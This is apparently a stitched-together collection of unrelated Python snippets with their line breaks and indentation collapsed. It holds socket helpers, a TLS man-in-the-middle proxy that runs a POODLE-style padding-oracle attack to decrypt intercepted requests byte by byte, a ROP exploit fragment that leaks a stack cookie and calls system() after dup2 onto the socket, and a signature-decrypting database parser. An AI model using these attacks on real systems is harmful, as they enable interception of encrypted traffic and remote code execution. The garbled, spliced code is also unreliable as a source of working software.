def print_data(msg, data): if log.isEnabledFor(logging.DEBUG): print(msg, file=sys.stderr) if print_hexdump: print_hexdump(data, colored=True, file=sys.stderr) else: print(data, file=sys.stderr)
def write(self, data): if log.isEnabledFor(logging.DEBUG) and print_hexdump is not False: log.debug('Sent Data:') print_hexdump(data, colored=True, file=sys.stderr) self._socket.setblocking(1) self._socket.sendall(data)
def read(self, count=None): data = None if count is None: self._socket.setblocking(0) rs = [self._socket] rs, _, _ = select.select(rs, [], []) if rs: data = rs[0].recv(4096) else: self._socket.setblocking(1) data = b'' while count: d = self._socket.recv(count) count -= len(d) data += d if log.isEnabledFor(logging.DEBUG) and print_hexdump is not False: log.debug('Recved Data:') print_hexdump(data, colored=True, file=sys.stderr) return data
def handle(self): self.log.info("New connection to %r from %r", self.server.server_address, self.client_address) filename = None if self.server.catcher.logdir is not None: filename = self.server.catcher.logdir / "{}_{}-{}_{}.log".format( *(self.server.server_address + self.client_address) ) for block in iter(partial(self.request.recv, 1024 * 4), b''): self.log.info('Received %d bytes from %r', len(block), self.client_address) if filename is not None: with filename.open('a') as fp: fp.write("{}: {}\n".format(datetime.now(), block.hex())) print_hexdump(block, colored=True, cols=16) self.log.info("Closing connection to %r from %r", self.server.server_address, self.client_address)
def start(self): server = socket.socket() server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(('', self.core.port)) server.listen() DEBUG = log.isEnabledFor(logging.DEBUG) def info(*args, **kwargs): if not log.isEnabledFor(logging.INFO): return args = tuple(map(self.core._color, args)) print(*args, **kwargs) decrypted = '' while True: s1 = StreamSocket(server.accept()[0], SSL) log.info('Connecting to %s:%d', self.core.ip, self.core.port) s2 = StreamSocket( socket.create_connection((self.core.ip, self.core.port)), SSL) peerof = {s1: s2, s2: s1} label = {s1: 'client', s2: 'server'} stop = False ctx = TLSSessionCtx('foo') ctx.server_ctx.load_rsa_keys_from_file(self.core.private_key) client_request = None block_offset = self.core.block_offset try: while not stop: ins, outs, errs = select([s1, s2], [], [], None) for s in ins: info("\033[97m>", label[s], "\033[0m") p = s.recv() if p is None or len(p) == 0: stop = True break if p.haslayer(TLSServerHello): ctx.printed = False ctx.master_secret = None ctx.match_server = s elif p.haslayer(TLSClientHello): ctx.match_client = s ctx.insert(p) # p.show() cipherdata = [] plaindata = [] for record in p.records: if record.haslayer(TLSRecord) and record[ TLSRecord].content_type == TLSContentType.HANDSHAKE: continue if record.haslayer(TLSCiphertext): cipherdata.append( (record, record[TLSCiphertext].data)) # print("\033[91mCiphertext\033[0m") # print_hexdump(record[TLSCiphertext].data, colored=True, cols=ctx.sec_params.block_size) if p.haslayer(TLSCiphertext) or (p.haslayer(TLSAlert) and p.haslayer(Raw)): # if ctx.master_secret and not ctx.printed: # print(ctx) # ctx.printed = True if s == ctx.match_client: ctx.set_mode(server=True) elif s == ctx.match_server: ctx.set_mode(client=True) if DEBUG: ssl = SSL(bytes(p), ctx=ctx) for record in ssl.records: if record.haslayer(TLSPlaintext): plaintext = record[TLSPlaintext] data = plaintext.data + plaintext.mac + plaintext.padding + bytes( [plaintext.padding_len]) plaindata.append(data) else: plaindata = [b''] * len(cipherdata) if ctx.sec_params is not None: mac_length = ctx.sec_params.mac_key_length mac_length += ctx.sec_params.block_size - ( mac_length % ctx.sec_params.block_size) for (record, cipher), plain in zip(cipherdata, plaindata): if len(cipher) > mac_length: if label[s] == 'client': info( "\033[94mProbably Request ({} > {})\033[0m" .format(len(cipher), mac_length)) client_request = cipher elif label[s] == 'server': info( "\033[94mProbably Response ({} > {})\033[0m" .format(len(cipher), mac_length)) info("\033[91mCiphertext\033[0m") print_hexdump(cipher, colored=True, cols=ctx.sec_params.block_size, bright=self.core.bright) if DEBUG: info("\033[92mPlaintext\033[0m") print_hexdump(plain, colored=True, cols=ctx.sec_params.block_size, bright=self.core.bright) if len(cipher) > mac_length: if label[s] == 'client': secret_block = cipher[ block_offset:block_offset + ctx.sec_params.block_size] cipher = cipher[:-ctx.sec_params. block_size] + secret_block record[TLSCiphertext].data = cipher info("\033[91mCiphertext new\033[0m") print_hexdump( cipher, colored=True, cols=ctx.sec_params.block_size, bright=self.core.bright) # p.show() elif label[s] == 'server': a = client_request[ -ctx.sec_params.block_size - 1] b = client_request[block_offset - 1] im = a ^ (ctx.sec_params.block_size - 1) ch = b ^ im decrypted = chr(ch) + decrypted info( "Decrypted: '{}' (0x{:02x} = 0x{:02x}^0x{:02x}^0x{:02x})" .format(decrypted, ch, a, ctx.sec_params.block_size - 1, b)) input('Enter to continue') s = peerof[s] s.send(p) except OSError: pass
system_addr = base_addr + libc.symbols['system'] exit_addr = base_addr + libc.symbols['exit'] log.info("System Addr: 0x{:x}".format(system_addr)) log.info("Exit Addr: 0x{:x}".format(exit_addr)) r.sendline("2") data = r.recvuntil(">") r.sendline("AAAA") data = r.recvuntil(">") stack_cookie = data[0x138:0x140] stored_rbp_word = struct.unpack('<Q', data[0x140:0x144] + '\0\0\0\0')[0] stored_rbp = stored_rbp_word + (0xffffffff00000000 & puts_addr) print_hexdump(stack_cookie, cols=16) log.info('Stored RBP: %x (%x)', stored_rbp, stored_rbp_word) rbp = stored_rbp - 0x20 - 0x10 log.info('RBP: %x', rbp) buffer_start = rbp - 0x140 buffer_end = buffer_start + BUF_SIZE rop.raw(unpack(stack_cookie)) rop.raw(stored_rbp) rop.dup2(4, 0) rop.dup2(4, 1) rop.system(0x0017c8c3 + base_addr) r.sendline("2")
def main(argv=None): parser = argparse.ArgumentParser() parser.add_argument('Database', type=argparse.FileType('rb')) args = parser.parse_args(args=argv) fp = args.Database while True: try: tag, data = parse(fp) if tag == 0xA9: assert len(data) >= 4 offset = struct.unpack_from('<I', data)[0] + 4 assert offset < len(data) some_type = struct.unpack_from('<B', data[offset:])[0] if some_type == 9: data_type, trust_code = struct.unpack_from('<BB', data[4:]) entry_data = data[6:offset] item = Item(EntryType(data_type), TrustLevel(trust_code), entry_data, data[offset + 2:]) print(str(item)) elif tag == 0xAC: print("Encrypted signature:") print_hexdump(data, colored=True, header=True) signature = PUBLIC_KEY.encrypt(bytes(reversed(data)), None)[0] print("\n"); print("Decrypted signature (DER):") print_hexdump(signature, colored=True, header=True, folded=True) print("\n"); signature = signature.split(b'\x00', 1)[1] try: assert signature[0] == 0x30 l = signature[1] signature = signature[2:2+l] assert signature[0] == 0x30 l = signature[1] algo = signature[2:2+l] hashsum = signature[2+l:] assert hashsum[0] == 0x4 l = hashsum[1] hashsum = hashsum[2:l+2] print("Hash:", hashsum.hex()) print("\n"); except: pass elif tag == 0x5C: continue; elif tag == 0x5D: continue; else: raise ValueError("Parsing error. Unknown tag {:02x}".format(tag)) except IndexError: break